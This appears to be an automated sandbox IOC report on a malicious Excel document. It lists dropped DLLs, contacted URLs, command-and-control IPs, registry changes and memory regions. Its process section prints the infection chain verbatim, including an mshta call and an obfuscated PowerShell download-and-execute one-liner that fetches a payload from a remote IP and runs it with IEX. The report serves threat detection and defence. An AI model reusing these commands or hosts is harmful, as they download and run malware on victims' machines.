IOC Report

loading gif

Files

File Path
Type
Category
Malicious
opastonline.com.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
initial sample
malicious
C:\ProgramData\JooSee.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\opastonline.com.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, 61414 bytes, 1 file
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\4885.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\Cab3F4.tmp
Microsoft Cabinet archive data, 61414 bytes, 1 file
dropped
C:\Users\user\AppData\Local\Temp\Tar3F5.tmp
data
modified
C:\Users\user\AppData\Local\Temp\~DF12B6563E3EBB8FF7.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFAC0F4649BC3134D1.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UJNNNXZ4C56ZCG4OC7O7.temp
data
dropped
C:\Windows\SysWOW64\Diftwn\pevlwp.arl (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.172/cc/vv/fe.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup

URLs

Name
IP
Malicious
http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3
unknown
malicious
http://ancyh.xyz
unknown
malicious
http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3
unknown
malicious
http://sep.dfwsolar.club/hzh3v/z
unknown
malicious
http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3
unknown
malicious
http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
unknown
malicious
http://weezual.fr/ju9c/twEHJDCvNwGimD/
213.186.33.4
malicious
http://danahousecare.com/wp-cont
unknown
malicious
http://ancyh.xyz/assets/Pcxv1k5/PE3
unknown
malicious
http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
unknown
malicious
http://91.240.11
unknown
malicious
http://91.240.118.172/cc/vv/fe.png
91.240.118.172
malicious
http://91.240.118.172/cc/vv/fe.pngPE3
unknown
malicious
http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3
unknown
malicious
http://91.240.118.172/cc/vv/fe.htmlfunction
unknown
malicious
http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
unknown
malicious
http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
unknown
malicious
http://michaelcrompton.co.uk/wp-admin/G/PE3
unknown
malicious
http://91.240.118.172/cc/vv/fe.htmlWinSta0
unknown
malicious
http://firstfitschool.com/83wg6z
unknown
malicious
https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
unknown
malicious
http://ancyh.xyz/assets/Pcxv1k5/
unknown
malicious
http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3
unknown
malicious
http://91.240.118.172/cc/vv/fe.htmlmshta
unknown
malicious
https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
unknown
malicious
http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3
unknown
malicious
http://91.240.118.172/cc/vv/fe.htmlB
unknown
malicious
http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
unknown
malicious
http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3
unknown
malicious
http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3
unknown
malicious
http://91.240.118.172
unknown
malicious
https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3
unknown
malicious
http://michaelcrompton.co.uk/wp-admin/G/
217.160.0.155
malicious
http://91.240.118.172/cc/vv/fe.htmlr
unknown
malicious
https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3
unknown
malicious
http://chupahfashion.com/eh6bwxk
unknown
malicious
http://91.240.118.172/cc/vv/fe.html
91.240.118.172
malicious
http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
unknown
malicious
http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
unknown
malicious
http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
unknown
malicious
http://91.240.118.172/cc/vv/fe.htmlngs
unknown
malicious
https://hekmat20.com/wp-includes
unknown
https://hekmat20.com/wp-includes/7/PE3
unknown
http://mycloud.s
unknown
http://www.protware.com/ll
unknown
http://stancewheels.com/wp-admin
unknown
https://www.belajarngaji.shop/wp
unknown
http://www.protware.com/
unknown
http://www.protware.com=C:
unknown
http://michaelcrompton.co.uk
unknown
http://mycloud.suplitecmo.com/Fo
unknown
http://www.protware.com/ode
unknown
http://mycloud.suplitecmo.com
unknown
http://weezual.fr
unknown
https://160.16.102.168:80/cdIXMWziBmZNcwbniRwTByQMFFhNrKiB
unknown
http://sep.dfwso
unknown
https://160.16.102.168/
unknown
https://160.16.102.168/7m
unknown
http://michaelcrompton.co.uk/wp-
unknown
http://www.protware.com
unknown
https://lambayeque.apiperu.net.p
unknown
http://weezual.f
unknown
http://weezual.fr/ju9c/twEHJDCvN
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://www.piriform.com/ccleaner
unknown
http://91.240.118.172/cc/vv/fe.p
unknown
https://hekmat20.com/wp-includes/7/
unknown
There are 57 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
michaelcrompton.co.uk
217.160.0.155
weezual.fr
213.186.33.4
mycloud.suplitecmo.com
unknown

IPs

IP
Domain
Country
Malicious
195.154.133.20
unknown
France
malicious
185.157.82.211
unknown
Poland
malicious
212.237.17.99
unknown
Italy
malicious
79.172.212.216
unknown
Hungary
malicious
110.232.117.186
unknown
Australia
malicious
173.214.173.220
unknown
United States
malicious
212.24.98.99
unknown
Lithuania
malicious
138.185.72.26
unknown
Brazil
malicious
178.63.25.185
unknown
Germany
malicious
160.16.102.168
unknown
Japan
malicious
81.0.236.90
unknown
Czech Republic
malicious
103.75.201.2
unknown
Thailand
malicious
216.158.226.206
unknown
United States
malicious
45.118.115.99
unknown
Indonesia
malicious
51.15.4.22
unknown
France
malicious
159.89.230.105
unknown
United States
malicious
162.214.50.39
unknown
United States
malicious
200.17.134.35
unknown
Brazil
malicious
217.182.143.207
unknown
France
malicious
107.182.225.142
unknown
United States
malicious
51.38.71.0
unknown
France
malicious
45.118.135.203
unknown
Japan
malicious
50.116.54.215
unknown
United States
malicious
131.100.24.231
unknown
Brazil
malicious
46.55.222.11
unknown
Bulgaria
malicious
41.76.108.46
unknown
South Africa
malicious
173.212.193.249
unknown
Germany
malicious
45.176.232.124
unknown
Colombia
malicious
178.79.147.66
unknown
United Kingdom
malicious
212.237.5.209
unknown
Italy
malicious
162.243.175.63
unknown
United States
malicious
176.104.106.96
unknown
Serbia
malicious
207.38.84.195
unknown
United States
malicious
164.68.99.3
unknown
Germany
malicious
192.254.71.210
unknown
United States
malicious
212.237.56.116
unknown
Italy
malicious
104.168.155.129
unknown
United States
malicious
45.142.114.231
unknown
Germany
malicious
203.114.109.124
unknown
Thailand
malicious
209.59.138.75
unknown
United States
malicious
159.8.59.82
unknown
United States
malicious
129.232.188.93
unknown
South Africa
malicious
91.240.118.172
unknown
unknown
malicious
58.227.42.236
unknown
Korea Republic of
malicious
158.69.222.101
unknown
Canada
malicious
104.251.214.46
unknown
United States
malicious
217.160.0.155
michaelcrompton.co.uk
Germany
213.186.33.4
weezual.fr
France
There are 38 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
7 )
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2E7FE
2E7FE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
9')
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\350BF
350BF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35763
35763
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
There are 67 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2370000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
150000
trusted library allocation
page execute and read and write
malicious
2BD0000
trusted library allocation
page execute and read and write
malicious
3030000
trusted library allocation
page execute and read and write
malicious
2810000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
3001000
trusted library allocation
page execute read
malicious
9C0000
trusted library allocation
page execute and read and write
malicious
180000
trusted library allocation
page execute and read and write
malicious
23A0000
trusted library allocation
page execute and read and write
malicious
2E31000
trusted library allocation
page execute read
malicious
23F1000
trusted library allocation
page execute read
malicious
341000
trusted library allocation
page execute read
malicious
1E1000
trusted library allocation
page execute read
malicious
730000
trusted library allocation
page execute and read and write
malicious
2D0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
8A1000
trusted library allocation
page execute read
malicious
9F1000
trusted library allocation
page execute read
malicious
31D1000
trusted library allocation
page execute read
malicious
2E61000
trusted library allocation
page execute read
malicious
761000
trusted library allocation
page execute read
malicious
29D0000
trusted library allocation
page execute and read and write
malicious
24B0000
trusted library allocation
page execute and read and write
malicious
2FB0000
trusted library allocation
page execute and read and write
malicious
2521000
trusted library allocation
page execute read
malicious
3241000
stack
page execute read
malicious
2F40000
trusted library allocation
page execute and read and write
malicious
28F1000
trusted library allocation
page execute read
malicious
31A1000
trusted library allocation
page execute read
malicious
211000
trusted library allocation
page execute read
malicious
2F70000
stack
page execute and read and write
malicious
2BA1000
trusted library allocation
page execute read
malicious
2C61000
trusted library allocation
page execute read
malicious
2D50000
trusted library allocation
page execute and read and write
malicious
29A1000
trusted library allocation
page execute read
malicious
31F0000
trusted library allocation
page execute and read and write
malicious
260000
trusted library allocation
page execute and read and write
malicious
2AD0000
trusted library allocation
page execute and read and write
malicious
2C90000
trusted library allocation
page execute and read and write
malicious
2B0000
trusted library allocation
page execute and read and write
malicious
31C1000
trusted library allocation
page execute read
malicious
2AA1000
trusted library allocation
page execute read
malicious
30D0000
trusted library allocation
page execute and read and write
malicious
721000
trusted library allocation
page execute read
malicious
2331000
trusted library allocation
page execute read
malicious
2D21000
trusted library allocation
page execute read
malicious
30A1000
trusted library allocation
page execute read
malicious
410000
trusted library allocation
page execute and read and write
malicious
3030000
trusted library allocation
page execute and read and write
malicious
3281000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
870000
trusted library allocation
page execute and read and write
malicious
2DE0000
trusted library allocation
page execute and read and write
malicious
2721000
trusted library allocation
page execute read
malicious
2D4D000
trusted library allocation
page read and write
22B0000
trusted library section
page readonly
30CB000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
2B8000
heap
page read and write
777000
heap
page read and write
32CF000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
2E80000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
6ED000
heap
page read and write
4703000
trusted library allocation
page read and write
31E3000
trusted library allocation
page read and write
324F000
trusted library allocation
page read and write
2B3E000
stack
page read and write
31AB000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
7FF00020000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
2330000
trusted library allocation
page read and write
2B2C000
heap
page read and write
263E000
trusted library allocation
page read and write
2639000
trusted library allocation
page read and write
2639000
trusted library allocation
page read and write
347E000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
2070000
heap
page read and write
7FF00210000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
3B2000
heap
page read and write
F4000
heap
page read and write
4914000
heap
page read and write
263A000
trusted library allocation
page read and write
2D44000
trusted library allocation
page read and write
6B99000
heap
page read and write
3627000
trusted library allocation
page read and write
2D50000
heap
page read and write
3B0000
heap
page read and write
20D8000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
2A60000
heap
page read and write
38AE000
stack
page read and write
2CEC000
trusted library allocation
page read and write
2ADF000
stack
page read and write
4911000
heap
page read and write
20B1000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
2BC0000
heap
page read and write
30CB000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
3209000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
307000
heap
page read and write
31D000
heap
page read and write
36F6000
trusted library allocation
page read and write
318F000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
1FE8000
trusted library allocation
page read and write
10000
heap
page read and write
2044000
heap
page read and write
2CEC000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
3613000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
29A0000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
1E70000
heap
page execute and read and write
1CF0000
trusted library allocation
page read and write
2413000
trusted library allocation
page read and write
2FA000
heap
page read and write
1CC40000
heap
page read and write
264E000
trusted library allocation
page read and write
2BCD000
heap
page read and write
7FF00270000
trusted library allocation
page execute and read and write
361F000
trusted library allocation
page read and write
2B0000
heap
page read and write
3F7000
heap
page read and write
760000
trusted library allocation
page read and write
3476000
trusted library allocation
page read and write
7FF0001A000
trusted library allocation
page execute and read and write
3627000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
32B0000
trusted library allocation
page read and write
2B22000
heap
page read and write
3627000
trusted library allocation
page read and write
3742000
trusted library allocation
page read and write
744000
trusted library allocation
page read and write
2B3F000
heap
page read and write
E87E000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
10000000
unkown
page readonly
2BD9000
heap
page read and write
36F0000
trusted library allocation
page read and write
3278000
trusted library allocation
page read and write
1F64000
heap
page read and write
2642000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
20AB000
heap
page read and write
7FF00190000
trusted library allocation
page execute and read and write
1BC0000
heap
page read and write
2094000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
325E000
trusted library allocation
page read and write
DD000
stack
page read and write
401000
heap
page read and write
46EB000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
2AC3000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
370A000
trusted library allocation
page read and write
2BC2000
heap
page read and write
20B1000
trusted library allocation
page read and write
3709000
trusted library allocation
page read and write
36F6000
trusted library allocation
page read and write
4911000
heap
page read and write
3627000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
2B76000
heap
page read and write
2D34000
trusted library allocation
page read and write
4956000
heap
page read and write
322F000
trusted library allocation
page read and write
2635000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
146000
heap
page read and write
2E54000
trusted library allocation
page read and write
204000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
2BC2000
heap
page read and write
374F000
trusted library allocation
page read and write
2AE5000
heap
page read and write
31EE000
trusted library allocation
page read and write
2B0000
heap
page read and write
378000
heap
page read and write
3A8000
heap
page read and write
2CEC000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
2B56000
heap
page read and write
36F8000
trusted library allocation
page read and write
7FF00170000
trusted library allocation
page execute and read and write
46EB000
trusted library allocation
page read and write
264C000
trusted library allocation
page read and write
25A0000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
3215000
trusted library allocation
page read and write
2B51000
heap
page read and write
2E50000
trusted library allocation
page read and write
3BB000
heap
page read and write
3F7000
heap
page read and write
2BA1000
heap
page read and write
26C000
stack
page read and write
20B8000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
3289000
trusted library allocation
page read and write
31D3000
trusted library allocation
page read and write
3AD000
heap
page read and write
48C000
heap
page read and write
329000
heap
page read and write
323F000
trusted library allocation
page read and write
3258000
trusted library allocation
page read and write
310000
heap
page read and write
34AC000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
2E84000
trusted library allocation
page read and write
7FF00112000
trusted library allocation
page execute and read and write
2230000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
401000
heap
page read and write
2D47000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
3DE000
heap
page read and write
376B000
trusted library allocation
page read and write
2BA1000
heap
page read and write
30CB000
trusted library allocation
page read and write
490D000
heap
page read and write
20B8000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
31D000
heap
page read and write
2410000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
2BCC000
heap
page read and write
385A000
trusted library allocation
page read and write
263D000
trusted library allocation
page read and write
7FF000E5000
trusted library allocation
page read and write
2BC0000
heap
page read and write
2B35000
heap
page read and write
2DDE000
stack
page read and write
2E5D000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
3024000
trusted library allocation
page read and write
34F3000
trusted library allocation
page read and write
30C3000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
3401000
trusted library allocation
page read and write
32A3000
trusted library allocation
page read and write
38D9000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
29D000
heap
page read and write
7FF00260000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
382000
heap
page read and write
20D8000
trusted library allocation
page read and write
375F000
trusted library allocation
page read and write
4928000
heap
page read and write
230B000
heap
page read and write
E87E000
trusted library allocation
page read and write
402000
heap
page read and write
2B35000
heap
page read and write
3627000
trusted library allocation
page read and write
2744000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2B18000
heap
page read and write
8FFE000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
27CB000
stack
page read and write
920E000
trusted library allocation
page read and write
334000
heap
page read and write
8FFE000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
344B000
stack
page read and write
239F000
stack
page read and write
2A0000
heap
page read and write
322B000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
361D000
trusted library allocation
page read and write
323E000
stack
page read and write
26B5000
trusted library allocation
page read and write
2B7E000
heap
page read and write
361D000
trusted library allocation
page read and write
2F3E000
stack
page read and write
20B1000
trusted library allocation
page read and write
12F41000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
4704000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
2B76000
heap
page read and write
2430000
trusted library allocation
page read and write
